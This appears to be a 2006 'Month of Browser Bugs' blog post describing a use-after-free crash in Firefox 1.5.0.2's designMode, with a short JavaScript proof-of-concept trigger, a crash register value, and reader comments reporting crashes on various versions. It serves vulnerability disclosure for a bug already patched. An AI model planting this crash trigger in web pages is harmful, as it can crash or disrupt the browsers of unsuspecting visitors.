MoBB #4: Mozilla Firefox DesignMode
The following bug was tested on Mozilla Firefox 1.5.0.2 running on Gentoo Linux. This bug was fixed in Firefox 1.5.0.3, after three other people reported this issue to Mozilla. This bug results in a function pointer being called that no longer exists on the heap. Exploiting it is more annoying than difficult, since getting user-provided memory to map over the free'd object pointer is more convoluted than it should be.
document.designMode = "on";
for (i=0; i < 300; i++) {
document.execCommand("InsertHTML", false, "<iframe src='localhost'/>");
}
document.designMode = "off";
window.location.reload(true);
Demonstration
EIP on Gentoo Linux / Firefox 1.5.0.1
0x00737069 in ?? ()
This bug was addressed in MFSA2006-30.
This bug has been added to the OSVDB:
Mozilla Firefox iframe.contentWindow.focus() Overflow
posted by hdm @ 11:30 PM
26 comments
links to this post
26 Comments:
very funny
keep this blog up
Am I allowed to be picky and note that the versions 1.0.5.x should be 1.5.0.x?
Crashed my 1.5.0.4
I did not notice a crash in 1.5.0.4 but with Ffbon echo 2.0a3 it breaks all hyper links. BUG REPORTED TO MOZILLA
just tested on ff 1.5.0.4 windows, it crashed...
crash and BSOD in 1.5.0.4 computer kept BSOD on startup
Crashed my Firefox 1.5.0.4 on Gentoo. IMHO 1.5.x Firefox is just a big piece of sh*t. 1.0.8 was SO much better.
This crashed my 1.5.0.3 on WinXP Pro SP2.
windows 1.5.0.4 crashed
1.5.0.4 crashed the first time, but I could not get it to crash afterwards.
With 1.5.0.4 on Gentoo, it does not crash, but it leaves the tab in "designMode", so you can edit the text in the page. Very fun!
Didn't crash 1.5.0.4 on Windows 2000.
Crashed 1.5.0.3 on Ubuntu 6.06
I guess I don't understand why you're posting about bugs that are already fixed. And anyone that posts that its still broken should head over to bugzilla and tell them.
The point of the blog is show what types of flaws affect modern browsers. Even if the bug has been fixed, it still applies to anyone who has yet to upgrade. If the bug hasn't been fixed, it will still be reported to the vendor prior to showing up here (with some exceptions).
I think it crashes if you didn't install developer tools.
FreeBSD - Seamonkey 1.0.2
didn't crash, but after a nice CPU burnout it made impossible to follow links or use the keyboard ;)
Fx 1.5.0.4 on Win XP SP2. It didn't crash, but leaved the tab in designMode
XP SP2, all latest updates
1.5.0.4 Firefox - many extensions, modifications
If I click the button for the exploit to take place and let it run it does not crash; however, if I try to close the tab in the middle of it's process, it will crash/close the browser
For those left in designMode, here is the link for tracking this bug,
[Bug 343686] Remain in design mode after demonstration of MFSA2006-30
https://bugzilla.mozilla.org/show_bug.cgi?id=343686
Tried this with 1.5.0.4 on Mac OSX. No crash but as reported before links quit working after the test was run.
Ff 2.0 B1 affected by [Bug 343686]
The bug is active just on the tab with FreeBSD 6.1 / Firefox 1.5.3 : I can edit the loaded page. But firefox doesn't crash. I close the tab and create a new one and firefox seems to be OK
Tested this with a patched version and now cannot click on links without reloading the browser. I'd say this is only a partial patch.
Firefox 2.0 beta does not crash on this.
Both document.designMode and document.execCommand threw security exceptions, as configured by me. Yet another proactive security measure succeeded!
Post a Comment
Links to this post:
Create a Link
<< Home